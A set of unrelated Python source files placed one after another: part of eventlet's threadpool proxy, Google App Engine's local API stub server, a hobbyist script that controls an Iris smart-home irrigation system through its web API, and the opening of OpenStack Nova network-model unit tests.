Normally *f* will be called in the threadpool with :func:`execute`; if the
keyword argument "nonblocking" is set to ``True``, it will simply be
executed directly. This is useful if you have an object which has methods
that don't need to be called in a separate thread, but which return objects
that should be Proxy wrapped.
"""
if kwargs.pop('nonblocking',False):
rv = f(*args, **kwargs)
else:
rv = execute(f,*args,**kwargs)
if isinstance(rv, autowrap):
return Proxy(rv, autowrap)
else:
return rv
class Proxy(object):
"""
a simple proxy-wrapper of any object that comes with a
methods-only interface, in order to forward every method
invocation onto a thread in the native-thread pool. A key
restriction is that the object's methods should not switch
greenlets or use Eventlet primitives, since they are in a
different thread from the main hub, and therefore might behave
unexpectedly. This is for running native-threaded code
only.
It's common to want to have some of the attributes or return
values also wrapped in Proxy objects (for example, database
connection objects produce cursor objects which also should be
wrapped in Proxy objects to remain nonblocking). *autowrap*, if
supplied, is a collection of types; if an attribute or return
value matches one of those types (via isinstance), it will be
wrapped in a Proxy. *autowrap_names* is a collection
of strings, which represent the names of attributes that should be
wrapped in Proxy objects when accessed.
"""
def __init__(self, obj,autowrap=(), autowrap_names=()):
self._obj = obj
self._autowrap = autowrap
self._autowrap_names = autowrap_names
def __getattr__(self,attr_name):
f = getattr(self._obj,attr_name)
if not hasattr(f, '__call__'):
if (isinstance(f, self._autowrap) or
attr_name in self._autowrap_names):
return Proxy(f, self._autowrap)
return f
def doit(*args, **kwargs):
result = proxy_call(self._autowrap, f, *args, **kwargs)
if attr_name in self._autowrap_names and not isinstance(result, Proxy):
return Proxy(result)
return result
return doit
# the following are a buncha methods that the python interpeter
# doesn't use getattr to retrieve and therefore have to be defined
# explicitly
def __getitem__(self, key):
return proxy_call(self._autowrap, self._obj.__getitem__, key)
def __setitem__(self, key, value):
return proxy_call(self._autowrap, self._obj.__setitem__, key, value)
def __deepcopy__(self, memo=None):
return proxy_call(self._autowrap, self._obj.__deepcopy__, memo)
def __copy__(self, memo=None):
return proxy_call(self._autowrap, self._obj.__copy__, memo)
def __call__(self, *a, **kw):
if '__call__' in self._autowrap_names:
return Proxy(proxy_call(self._autowrap, self._obj, *a, **kw))
else:
return proxy_call(self._autowrap, self._obj, *a, **kw)
# these don't go through a proxy call, because they're likely to
# be called often, and are unlikely to be implemented on the
# wrapped object in such a way that they would block
def __eq__(self, rhs):
return self._obj == rhs
def __hash__(self):
return self._obj.__hash__()
def __repr__(self):
return self._obj.__repr__()
def __str__(self):
return self._obj.__str__()
def __len__(self):
return len(self._obj)
def __nonzero__(self):
return bool(self._obj)
def __iter__(self):
it = iter(self._obj)
if it == self._obj:
return self
else:
return Proxy(it)
def next(self):
return proxy_call(self._autowrap, self._obj.next)
_nthreads = int(os.environ.get('EVENTLET_THREADPOOL_SIZE', 20))
_threads = []
_coro = None
_setup_already = False
def setup():
global _rfile, _wfile, _threads, _coro, _setup_already, _rspq
if _setup_already:
return
else:
_setup_already = True
try:
_rpipe, _wpipe = os.pipe()
_wfile = greenio.GreenPipe(_wpipe, 'wb', 0)
_rfile = greenio.GreenPipe(_rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead of a pipe because
# pipes don't really exist on Windows.
import socket
from eventlet import util
sock = util.__original_socket__(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = util.__original_socket__(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
_rfile = greenio.GreenSocket(csock).makefile('rb', 0)
_wfile = nsock.makefile('wb',0)
_rspq = Queue(maxsize=-1)
assert _nthreads >= 0, "Can't specify negative number of threads"
if _nthreads == 0:
import warnings
warnings.warn("Zero threads in tpool. All tpool.execute calls will\
execute in main thread. Check the value of the environment \
variable EVENTLET_THREADPOOL_SIZE.", RuntimeWarning)
for i in xrange(_nthreads):
reqq = Queue(maxsize=-1)
t = threading.Thread(target=tworker,
name="tpool_thread_%s" % i,
args=(reqq,))
t.setDaemon(True)
t.start()
_threads.append((reqq, t))
_coro = greenthread.spawn_n(tpool_trampoline)
def killall():
global _setup_already, _rspq, _rfile, _wfile
if not _setup_already:
return
for reqq, _ in _threads:
reqq.put(None)
for _, thr in _threads:
thr.join()
del _threads[:]
if _coro is not None:
greenthread.kill(_coro)
_rfile.close()
_wfile.close()
_rfile = None
_wfile = None
_rspq = None
_setup_already = False
| |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Serves the stub App Engine APIs (e.g. memcache, datastore) over HTTP.
The Remote API protocol is used for communication.
"""
import logging
import os
import pickle
import shutil
import socket
import sys
import tempfile
import threading
import time
import traceback
import urllib2
import urlparse
import google
import yaml
# Stubs
from google.appengine.api import datastore_file_stub
from google.appengine.api import mail_stub
from google.appengine.api import urlfetch_stub
from google.appengine.api import user_service_stub
from google.appengine.api.app_identity import app_identity_stub
from google.appengine.api.blobstore import blobstore_stub
from google.appengine.api.blobstore import file_blob_storage
from google.appengine.api.capabilities import capability_stub
from google.appengine.api.channel import channel_service_stub
from google.appengine.api.files import file_service_stub
from google.appengine.api.logservice import logservice_stub
from google.appengine.api.search import simple_search_stub
from google.appengine.api.taskqueue import taskqueue_stub
from google.appengine.api.prospective_search import prospective_search_stub
from google.appengine.api.memcache import memcache_stub
from google.appengine.api.modules import modules_stub
from google.appengine.api.remote_socket import _remote_socket_stub
from google.appengine.api.system import system_stub
from google.appengine.api.xmpp import xmpp_service_stub
from google.appengine.datastore import datastore_sqlite_stub
from google.appengine.datastore import datastore_stub_util
from google.appengine.datastore import datastore_v4_pb
from google.appengine.datastore import datastore_v4_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import datastore
from google.appengine.ext.remote_api import remote_api_pb
from google.appengine.ext.remote_api import remote_api_services
from google.appengine.runtime import apiproxy_errors
from google.appengine.tools.devappserver2 import wsgi_server
# TODO: Remove this lock when stubs have been audited for thread
# safety.
GLOBAL_API_LOCK = threading.RLock()
# We don't want to support datastore_v4 everywhere, because users are supposed
# to use the Cloud Datastore API going forward, so we don't want to put these
# entries in remote_api_servers.SERVICE_PB_MAP. But for our own implementation
# of the Cloud Datastore API we need those methods to work when an instance
# issues them, specifically the DatstoreApiServlet running as a module inside
# the app we are running. The consequence is that other app code can also
# issue datastore_v4 API requests, but since we don't document these requests
# or export them through any language bindings this is unlikely in practice.
_DATASTORE_V4_METHODS = {
'AllocateIds': (datastore_v4_pb.AllocateIdsRequest,
datastore_v4_pb.AllocateIdsResponse),
'BeginTransaction': (datastore_v4_pb.BeginTransactionRequest,
datastore_v4_pb.BeginTransactionResponse),
'Commit': (datastore_v4_pb.CommitRequest,
datastore_v4_pb.CommitResponse),
'ContinueQuery': (datastore_v4_pb.ContinueQueryRequest,
datastore_v4_pb.ContinueQueryResponse),
'Lookup': (datastore_v4_pb.LookupRequest,
datastore_v4_pb.LookupResponse),
'Rollback': (datastore_v4_pb.RollbackRequest,
datastore_v4_pb.RollbackResponse),
'RunQuery': (datastore_v4_pb.RunQueryRequest,
datastore_v4_pb.RunQueryResponse),
}
def _execute_request(request):
"""Executes an API method call and returns the response object.
Args:
request: A remote_api_pb.Request object representing the API call e.g. a
call to memcache.Get.
Returns:
A ProtocolBuffer.ProtocolMessage representing the API response e.g. a
memcache_service_pb.MemcacheGetResponse.
Raises:
apiproxy_errors.CallNotFoundError: if the requested method doesn't exist.
apiproxy_errors.ApplicationError: if the API method calls fails.
"""
service = request.service_name()
method = request.method()
if request.has_request_id():
request_id = request.request_id()
else:
logging.error('Received a request without request_id: %s', request)
request_id = None
service_methods = (_DATASTORE_V4_METHODS if service == 'datastore_v4'
else remote_api_services.SERVICE_PB_MAP.get(service, {}))
# We do this rather than making a new map that is a superset of
# remote_api_services.SERVICE_PB_MAP because that map is not initialized
# all in one place, so we would have to be careful about where we made
# our new map.
request_class, response_class = service_methods.get(method, (None, None))
if not request_class:
raise apiproxy_errors.CallNotFoundError('%s.%s does not exist' % (service,
method))
request_data = request_class()
request_data.ParseFromString(request.request())
response_data = response_class()
service_stub = apiproxy_stub_map.apiproxy.GetStub(service)
def make_request():
service_stub.MakeSyncCall(service,
method,
request_data,
response_data,
request_id)
# If the service has not declared itself as threadsafe acquire
# GLOBAL_API_LOCK.
if service_stub.THREADSAFE:
make_request()
else:
with GLOBAL_API_LOCK:
make_request()
return response_data
class APIServer(wsgi_server.WsgiServer):
"""Serves API calls over HTTP."""
def __init__(self, host, port, app_id):
self._app_id = app_id
self._host = host
super(APIServer, self).__init__((host, port), self)
def start(self):
"""Start the API Server."""
super(APIServer, self).start()
logging.info('Starting API server at: http://%s:%d', self._host, self.port)
def quit(self):
cleanup_stubs()
super(APIServer, self).quit()
def _handle_POST(self, environ, start_response):
start_response('200 OK', [('Content-Type', 'application/octet-stream')])
start_time = time.time()
response = remote_api_pb.Response()
try:
request = remote_api_pb.Request()
# NOTE: Exceptions encountered when parsing the PB or handling the request
# will be propagated back to the caller the same way as exceptions raised
# by the actual API call.
if environ.get('HTTP_TRANSFER_ENCODING') == 'chunked':
# CherryPy concatenates all chunks when 'wsgi.input' is read but v3.2.2
# will not return even when all of the data in all chunks has been
# read. See: https://bitbucket.org/cherrypy/cherrypy/issue/1131.
wsgi_input = environ['wsgi.input'].read(2**32)
else:
wsgi_input = environ['wsgi.input'].read(int(environ['CONTENT_LENGTH']))
request.ParseFromString(wsgi_input)
api_response = _execute_request(request).Encode()
response.set_response(api_response)
except Exception, e:
if isinstance(e, apiproxy_errors.ApplicationError):
level = logging.DEBUG
application_error = response.mutable_application_error()
application_error.set_code(e.application_error)
application_error.set_detail(e.error_detail)
else:
# If the runtime instance is not Python, it won't be able to unpickle
# the exception so use level that won't be ignored by default.
level = logging.ERROR
# Even if the runtime is Python, the exception may be unpicklable if
# it requires importing a class blocked by the sandbox so just send
# back the exception representation.
# But due to our use of the remote API, at least some apiproxy errors
# are generated in the Dev App Server main instance and not in the
# language runtime and wrapping them causes different behavior from
# prod so don't wrap them.
if not isinstance(e, apiproxy_errors.Error):
e = RuntimeError(repr(e))
# While not strictly necessary for ApplicationError, do this to limit
# differences with remote_api:handler.py.
response.set_exception(pickle.dumps(e))
logging.log(level, 'Exception while handling %s\n%s', request,
traceback.format_exc())
encoded_response = response.Encode()
logging.debug('Handled %s.%s in %0.4f',
request.service_name(),
request.method(),
time.time() - start_time)
return [encoded_response]
def _handle_GET(self, environ, start_response):
params = urlparse.parse_qs(environ['QUERY_STRING'])
rtok = params.get('rtok', ['0'])[0]
start_response('200 OK', [('Content-Type', 'text/plain')])
return [yaml.dump({'app_id': self._app_id,
'rtok': rtok})]
def __call__(self, environ, start_response):
if environ['REQUEST_METHOD'] == 'GET':
return self._handle_GET(environ, start_response)
elif environ['REQUEST_METHOD'] == 'POST':
return self._handle_POST(environ, start_response)
else:
start_response('405 Method Not Allowed', [])
return []
def setup_stubs(
request_data,
app_id,
application_root,
trusted,
appidentity_email_address,
appidentity_private_key_path,
blobstore_path,
datastore_consistency,
datastore_path,
datastore_require_indexes,
datastore_auto_id_policy,
images_host_prefix,
logs_path,
mail_smtp_host,
mail_smtp_port,
mail_smtp_user,
mail_smtp_password,
mail_enable_sendmail,
mail_show_mail_body,
mail_allow_tls,
matcher_prospective_search_path,
search_index_path,
taskqueue_auto_run_tasks,
taskqueue_default_http_server,
user_login_url,
user_logout_url,
default_gcs_bucket_name):
"""Configures the APIs hosted by this server.
Args:
request_data: An apiproxy_stub.RequestInformation instance used by the
stubs to lookup information about the request associated with an API
call.
app_id: The str application id e.g. "guestbook".
application_root: The path to the directory containing the user's
application e.g. "/home/joe/myapp".
trusted: A bool indicating if privileged APIs should be made available.
appidentity_email_address: Email address associated with a service account
that has a downloadable key. May be None for no local application
identity.
appidentity_private_key_path: Path to private key file associated with
service account (.pem format). Must be set if appidentity_email_address
is set.
blobstore_path: The path to the file that should be used for blobstore
storage.
datastore_consistency: The datastore_stub_util.BaseConsistencyPolicy to
use as the datastore consistency policy.
datastore_path: The path to the file that should be used for datastore
storage.
datastore_require_indexes: A bool indicating if the same production
datastore indexes requirements should be enforced i.e. if True then
a google.appengine.ext.db.NeedIndexError will be be raised if a query
is executed without the required indexes.
datastore_auto_id_policy: The type of sequence from which the datastore
stub assigns auto IDs, either datastore_stub_util.SEQUENTIAL or
datastore_stub_util.SCATTERED.
images_host_prefix: The URL prefix (protocol://host:port) to prepend to
image urls on calls to images.GetUrlBase.
logs_path: Path to the file to store the logs data in.
mail_smtp_host: The SMTP hostname that should be used when sending e-mails.
If None then the mail_enable_sendmail argument is considered.
mail_smtp_port: The SMTP port number that should be used when sending
e-mails. If this value is None then mail_smtp_host must also be None.
mail_smtp_user: The username to use when authenticating with the
SMTP server. This value may be None if mail_smtp_host is also None or if
the SMTP server does not require authentication.
mail_smtp_password: The password to use when authenticating with the
SMTP server. This value may be None if mail_smtp_host or mail_smtp_user
is also None.
mail_enable_sendmail: A bool indicating if sendmail should be used when
sending e-mails. This argument is ignored if mail_smtp_host is not None.
mail_show_mail_body: A bool indicating whether the body of sent e-mails
should be written to the logs.
mail_allow_tls: A bool indicating whether TLS should be allowed when
communicating with an SMTP server. This argument is ignored if
mail_smtp_host is None.
matcher_prospective_search_path: The path to the file that should be used to
save prospective search subscriptions.
search_index_path: The path to the file that should be used for search index
storage.
taskqueue_auto_run_tasks: A bool indicating whether taskqueue tasks should
be run automatically or it the must be manually triggered.
taskqueue_default_http_server: A str containing the address of the http
server that should be used to execute tasks.
user_login_url: A str containing the url that should be used for user login.
user_logout_url: A str containing the url that should be used for user
logout.
default_gcs_bucket_name: A str, overriding the default bucket behavior.
"""
identity_stub = app_identity_stub.AppIdentityServiceStub.Create(
email_address=appidentity_email_address,
private_key_path=appidentity_private_key_path)
if default_gcs_bucket_name is not None:
identity_stub.SetDefaultGcsBucketName(default_gcs_bucket_name)
apiproxy_stub_map.apiproxy.RegisterStub('app_identity_service', identity_stub)
blob_storage = file_blob_storage.FileBlobStorage(blobstore_path, app_id)
apiproxy_stub_map.apiproxy.RegisterStub(
'blobstore',
blobstore_stub.BlobstoreServiceStub(blob_storage,
request_data=request_data))
apiproxy_stub_map.apiproxy.RegisterStub(
'capability_service',
capability_stub.CapabilityServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'channel',
channel_service_stub.ChannelServiceStub(request_data=request_data))
datastore_stub = datastore_sqlite_stub.DatastoreSqliteStub(
app_id,
datastore_path,
datastore_require_indexes,
trusted,
root_path=application_root,
auto_id_policy=datastore_auto_id_policy)
datastore_stub.SetConsistencyPolicy(datastore_consistency)
apiproxy_stub_map.apiproxy.ReplaceStub(
'datastore_v3', datastore_stub)
apiproxy_stub_map.apiproxy.RegisterStub(
'datastore_v4',
datastore_v4_stub.DatastoreV4Stub(app_id))
apiproxy_stub_map.apiproxy.RegisterStub(
'file',
file_service_stub.FileServiceStub(blob_storage))
try:
from google.appengine.api.images import images_stub
except ImportError:
logging.warning('Could not initialize images API; you are likely missing '
'the Python "PIL" module.')
# We register a stub which throws a NotImplementedError for most RPCs.
from google.appengine.api.images import images_not_implemented_stub
apiproxy_stub_map.apiproxy.RegisterStub(
'images',
images_not_implemented_stub.ImagesNotImplementedServiceStub(
host_prefix=images_host_prefix))
else:
apiproxy_stub_map.apiproxy.RegisterStub(
'images',
images_stub.ImagesServiceStub(host_prefix=images_host_prefix))
apiproxy_stub_map.apiproxy.RegisterStub(
'logservice',
logservice_stub.LogServiceStub(logs_path=logs_path))
apiproxy_stub_map.apiproxy.RegisterStub(
'mail',
mail_stub.MailServiceStub(mail_smtp_host,
mail_smtp_port,
mail_smtp_user,
mail_smtp_password,
enable_sendmail=mail_enable_sendmail,
show_mail_body=mail_show_mail_body,
allow_tls=mail_allow_tls))
apiproxy_stub_map.apiproxy.RegisterStub(
'memcache',
memcache_stub.MemcacheServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'search',
simple_search_stub.SearchServiceStub(index_file=search_index_path))
apiproxy_stub_map.apiproxy.RegisterStub(
'modules',
modules_stub.ModulesServiceStub(request_data))
apiproxy_stub_map.apiproxy.RegisterStub(
'system',
system_stub.SystemServiceStub(request_data=request_data))
apiproxy_stub_map.apiproxy.RegisterStub(
'taskqueue',
taskqueue_stub.TaskQueueServiceStub(
root_path=application_root,
auto_task_running=taskqueue_auto_run_tasks,
default_http_server=taskqueue_default_http_server,
request_data=request_data))
apiproxy_stub_map.apiproxy.GetStub('taskqueue').StartBackgroundExecution()
apiproxy_stub_map.apiproxy.RegisterStub(
'urlfetch',
urlfetch_stub.URLFetchServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'user',
user_service_stub.UserServiceStub(login_url=user_login_url,
logout_url=user_logout_url,
request_data=request_data))
apiproxy_stub_map.apiproxy.RegisterStub(
'xmpp',
xmpp_service_stub.XmppServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'matcher',
prospective_search_stub.ProspectiveSearchStub(
matcher_prospective_search_path,
apiproxy_stub_map.apiproxy.GetStub('taskqueue')))
apiproxy_stub_map.apiproxy.RegisterStub(
'remote_socket',
_remote_socket_stub.RemoteSocketServiceStub())
def maybe_convert_datastore_file_stub_data_to_sqlite(app_id, filename):
if not os.access(filename, os.R_OK | os.W_OK):
return
try:
with open(filename, 'rb') as f:
if f.read(16) == 'SQLite format 3\x00':
return
except (IOError, OSError):
return
try:
_convert_datastore_file_stub_data_to_sqlite(app_id, filename)
except:
logging.exception('Failed to convert datastore file stub data to sqlite.')
raise
def _convert_datastore_file_stub_data_to_sqlite(app_id, datastore_path):
logging.info('Converting datastore stub data to sqlite.')
previous_stub = apiproxy_stub_map.apiproxy.GetStub('datastore_v3')
try:
apiproxy_stub_map.apiproxy = apiproxy_stub_map.APIProxyStubMap()
datastore_stub = datastore_file_stub.DatastoreFileStub(
app_id, datastore_path, trusted=True, save_changes=False)
apiproxy_stub_map.apiproxy.RegisterStub('datastore_v3', datastore_stub)
entities = _fetch_all_datastore_entities()
sqlite_datastore_stub = datastore_sqlite_stub.DatastoreSqliteStub(
app_id, datastore_path + '.sqlite', trusted=True)
apiproxy_stub_map.apiproxy.ReplaceStub('datastore_v3',
sqlite_datastore_stub)
datastore.Put(entities)
sqlite_datastore_stub.Close()
finally:
apiproxy_stub_map.apiproxy.ReplaceStub('datastore_v3', previous_stub)
shutil.copy(datastore_path, datastore_path + '.filestub')
os.remove(datastore_path)
shutil.move(datastore_path + '.sqlite', datastore_path)
logging.info('Datastore conversion complete. File stub data has been backed '
'up in %s', datastore_path + '.filestub')
def _fetch_all_datastore_entities():
"""Returns all datastore entities from all namespaces as a list."""
all_entities = []
for namespace in datastore.Query('__namespace__').Run():
namespace_name = namespace.key().name()
for kind in datastore.Query('__kind__', namespace=namespace_name).Run():
all_entities.extend(
datastore.Query(kind.key().name(), namespace=namespace_name).Run())
return all_entities
def test_setup_stubs(
request_data=None,
app_id='myapp',
application_root='/tmp/root',
trusted=False,
appidentity_email_address=None,
appidentity_private_key_path=None,
blobstore_path='/dev/null',
datastore_consistency=None,
datastore_path=':memory:',
datastore_require_indexes=False,
datastore_auto_id_policy=datastore_stub_util.SCATTERED,
images_host_prefix='http://localhost:8080',
logs_path=':memory:',
mail_smtp_host='',
mail_smtp_port=25,
mail_smtp_user='',
mail_smtp_password='',
mail_enable_sendmail=False,
mail_show_mail_body=False,
mail_allow_tls=True,
matcher_prospective_search_path='/dev/null',
search_index_path=None,
taskqueue_auto_run_tasks=False,
taskqueue_default_http_server='http://localhost:8080',
user_login_url='/_ah/login?continue=%s',
user_logout_url='/_ah/login?continue=%s',
default_gcs_bucket_name=None):
"""Similar to setup_stubs with reasonable test defaults and recallable."""
# Reset the stub map between requests because a stub map only allows a
# stub to be added once.
apiproxy_stub_map.apiproxy = apiproxy_stub_map.APIProxyStubMap()
if datastore_consistency is None:
datastore_consistency = (
datastore_stub_util.PseudoRandomHRConsistencyPolicy())
setup_stubs(request_data,
app_id,
application_root,
trusted,
appidentity_email_address,
appidentity_private_key_path,
blobstore_path,
datastore_consistency,
datastore_path,
datastore_require_indexes,
datastore_auto_id_policy,
images_host_prefix,
logs_path,
mail_smtp_host,
mail_smtp_port,
mail_smtp_user,
mail_smtp_password,
mail_enable_sendmail,
mail_show_mail_body,
mail_allow_tls,
matcher_prospective_search_path,
search_index_path,
taskqueue_auto_run_tasks,
taskqueue_default_http_server,
user_login_url,
user_logout_url,
default_gcs_bucket_name)
def cleanup_stubs():
"""Do any necessary stub cleanup e.g. saving data."""
# Saving datastore
logging.info('Applying all pending transactions and saving the datastore')
datastore_stub = apiproxy_stub_map.apiproxy.GetStub('datastore_v3')
datastore_stub.Write()
logging.info('Saving search indexes')
apiproxy_stub_map.apiproxy.GetStub('search').Write()
apiproxy_stub_map.apiproxy.GetStub('taskqueue').Shutdown()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import traceback
def LogConsole(arg):
print("%s" % arg)
#===============================================================================
# easy_install requests
from requests import session
import json
import urllib
import uuid
class Iris:
#-----------------------------------------------------------------------------
#
# login
#
def login(self, username, password):
payload = {
'username': username,
'password': password,
'caller': 'iPhone',
'detail': 'tariff hub widgets',
'version': '1.8.1',
}
payloadString = ""
for key in payload:
payloadString += "%s=%s&" % (key, urllib.quote(payload[key]))
payloadString = payloadString[:len(payloadString)-1]
print payloadString
response = self.www.post('https://api.irissmarthome.com/v5/login', data=payloadString, headers=self.headers, proxies=self.proxies)
print response
# print response.status_code
if response.status_code == 200:
LogConsole("Login success")
return 0
else:
LogConsole("Login fail")
return 1
#-----------------------------------------------------------------------------
def irrigationState(self, username):
self.headers['If-None-Match'] = str(uuid.uuid4()).replace('-','')
response = None
while True:
response = self.www.get('https://api.irissmarthome.com/v5/users/%s/widgets/irrigation' % username, headers=self.headers, proxies=self.proxies)
if response.status_code != 304:
break
print response
data = response.json()
# print data
# print data['irrigation']['devices']
for device in data['irrigation']['devices']:
print device['id']
print device['name']
zone = data['irrigation']['active']
print zone['id']
print zone['name']
print zone['state']
# print response.status_code
if response.status_code == 200:
LogConsole("Irrigation success")
return 0
else:
LogConsole("Irrigation fail")
return 1
#-----------------------------------------------------------------------------
def dashboard(self, username):
self.headers['If-None-Match'] = str(uuid.uuid4()).replace('-','')
response = None
while True:
response = self.www.get('https://api.irissmarthome.com/v5/users/%s/widgets/dashboard?logSize=3' % username, headers=self.headers, proxies=self.proxies)
if response.status_code != 304:
break
print response
data = response.json()
# print data
devices = data['IRRIGATION']['irrigation']
print devices
for device in devices:
print "%s:%s" % device['id'], device['state']
if state == 'WATERING':
return True
elif state == 'IDLE':
return False
else:
return False
# print response.status_code
if response.status_code == 200:
LogConsole("Irrigation success")
return 0
else:
LogConsole("Irrigation fail")
return 1
#-----------------------------------------------------------------------------
def irrigationStart(self, username, macaddr, duration):
self.headers.pop('If-None-Match', None)
payload = {
'duration': 1,
'zoneId': 'AD-2E-00-00-0B-B6-AD-01'
}
response = self.www.put('https://api.irissmarthome.com/v5/users/%s/widgets/irrigation/%s/state' % (username, macaddr), headers=self.headers, data=payload, proxies=self.proxies)
print response
# print response.status_code
if response.status_code == 204:
LogConsole("Irrigation success")
return 0
else:
LogConsole("Irrigation fail")
return 1
#-----------------------------------------------------------------------------
def irrigationStop(self, username, macaddr):
self.headers.pop('If-None-Match', None)
response = self.www.put('https://api.irissmarthome.com/v5/users/%s/widgets/irrigation/%s/stop' % (username, macaddr), headers=self.headers, proxies=self.proxies)
print response
# print response.status_code
if response.status_code == 204:
LogConsole("Irrigation success")
return 0
else:
LogConsole("Irrigation fail")
return 1
#-----------------------------------------------------------------------------
def logout(self):
None
#-----------------------------------------------------------------------------
def __init__(self, arg):
try:
self.www = session()
self.proxies = {
"http": "http://192.168.1.201:8888",
"https": "http://192.168.1.201:8888",
}
self.headers = {
"User-Agent": "Iris 1.8.1 rv:1173 (iPhone; iPhone OS 7.1; en_US)",
"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
"Accept-Encoding": "gzip",
"Connection": "close",
"Proxy-Connection": "close",
}
except:
print sys.exc_info()[0]
#===============================================================================
if __name__ == "__main__":
version = 1.0
LogConsole("Iris Control v.%f" % version)
configFile = "%s/config.json" % os.path.dirname(sys.argv[0])
fd = open(os.path.expanduser(configFile), 'r')
config = json.load(fd)
argc = len(sys.argv)
if (argc == 1):
filter = 'Water'
tgtstate = 'off'
else:
filter = sys.argv[1].lower().strip()
tgtstate = sys.argv[2].lower().strip()
iris = Iris(0)
rc = iris.login(config['iris']['username'], config['iris']['password'])
if rc:
exit(1)
macaddr = '00-00-00-00-00-00-00-00'
if tgtstate == 'on':
iris.irrigationState(config['iris']['username'])
iris.irrigationStart(config['iris']['username'], macaddr, 1)
iris.irrigationState(config['iris']['username'])
else:
iris.irrigationState(config['iris']['username'])
iris.irrigationStop(config['iris']['username'], macaddr)
iris.irrigationState(config['iris']['username'])
if rc:
exit(1)
iris.logout()
#===============================================================================
| |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova import exception
from nova.network import model
from nova import test
from nova.tests.unit import fake_network_cache_model
from nova.virt import netutils
class RouteTests(test.NoDBTestCase):
def test_create_route_with_attrs(self):
route = fake_network_cache_model.new_route()
fake_network_cache_model.new_ip(dict(address='192.168.1.1'))
self.assertEqual('0.0.0.0/24', route['cidr'])
self.assertEqual('192.168.1.1', route['gateway']['address'])
self.assertEqual('eth0', route['interface'])
def test_routes_equal(self):
route1 = model.Route()
route2 = model.Route()
self.assertEqual(route1, route2)
def test_routes_not_equal(self):
route1 = model.Route(cidr='1.1.1.0/24')
route2 = model.Route(cidr='2.2.2.0/24')
self.assertNotEqual(route1, route2)
route1 = model.Route(cidr='1.1.1.1/24', gateway='1.1.1.1')
route2 = model.Route(cidr='1.1.1.1/24', gateway='1.1.1.2')
self.assertNotEqual(route1, route2)
route1 = model.Route(cidr='1.1.1.1/24', interface='tap0')
route2 = model.Route(cidr='1.1.1.1/24', interface='tap1')
self.assertNotEqual(route1, route2)
def test_hydrate(self):
route = model.Route.hydrate(
{'gateway': fake_network_cache_model.new_ip(
dict(address='192.168.1.1'))})
self.assertIsNone(route['cidr'])
self.assertEqual('192.168.1.1', route['gateway']['address'])
self.assertIsNone(route['interface'])
class IPTests(test.NoDBTestCase):
def test_ip_equal(self):
ip1 = model.IP(address='127.0.0.1')
ip2 = model.IP(address='127.0.0.1')
self.assertEqual(ip1, ip2)
def test_ip_not_equal(self):
ip1 = model.IP(address='127.0.0.1')
ip2 = model.IP(address='172.0.0.3')
self.assertNotEqual(ip1, ip2)
ip1 = model.IP(address='127.0.0.1', type=1)
ip2 = model.IP(address='172.0.0.1', type=2)
self.assertNotEqual(ip1, ip2)
ip1 = model.IP(address='127.0.0.1', version=4)
ip2 = model.IP(address='172.0.0.1', version=6)
self.assertNotEqual(ip1, ip2)
class FixedIPTests(test.NoDBTestCase):
def test_createnew_fixed_ip_with_attrs(self):
fixed_ip = model.FixedIP(address='192.168.1.100')
self.assertEqual('192.168.1.100', fixed_ip['address'])
self.assertEqual([], fixed_ip['floating_ips'])
self.assertEqual('fixed', fixed_ip['type'])
self.assertEqual(4, fixed_ip['version'])
def test_create_fixed_ipv6(self):
fixed_ip = model.FixedIP(address='::1')
self.assertEqual('::1', fixed_ip['address'])
self.assertEqual([], fixed_ip['floating_ips'])
self.assertEqual('fixed', fixed_ip['type'])
self.assertEqual(6, fixed_ip['version'])
def test_create_fixed_bad_ip_fails(self):
self.assertRaises(exception.InvalidIpAddressError,
model.FixedIP,
address='picklespicklespickles')
def test_equate_two_fixed_ips(self):
fixed_ip = model.FixedIP(address='::1')
fixed_ip2 = model.FixedIP(address='::1')
self.assertEqual(fixed_ip, fixed_ip2)
def test_equate_two_dissimilar_fixed_ips_fails(self):
fixed_ip = model.FixedIP(address='::1')
fixed_ip2 = model.FixedIP(address='::2')
self.assertNotEqual(fixed_ip, fixed_ip2)
fixed_ip = model.FixedIP(address='::1', type='1')
fixed_ip2 = model.FixedIP(address='::1', type='2')
self.assertNotEqual(fixed_ip, fixed_ip2)
fixed_ip = model.FixedIP(address='::1', version='6')
fixed_ip2 = model.FixedIP(address='::1', version='4')
self.assertNotEqual(fixed_ip, fixed_ip2)
fixed_ip = model.FixedIP(address='::1', floating_ips='1.1.1.1')
fixed_ip2 = model.FixedIP(address='::1', floating_ips='8.8.8.8')
self.assertNotEqual(fixed_ip, fixed_ip2)
def test_hydrate(self):
fixed_ip = model.FixedIP.hydrate({})
self.assertEqual([], fixed_ip['floating_ips'])
self.assertIsNone(fixed_ip['address'])
self.assertEqual('fixed', fixed_ip['type'])
self.assertIsNone(fixed_ip['version'])
def test_add_floating_ip(self):
fixed_ip = model.FixedIP(address='192.168.1.100')
fixed_ip.add_floating_ip('192.168.1.101')
self.assertEqual(['192.168.1.101'], fixed_ip['floating_ips'])
def test_add_floating_ip_repeatedly_only_one_instance(self):
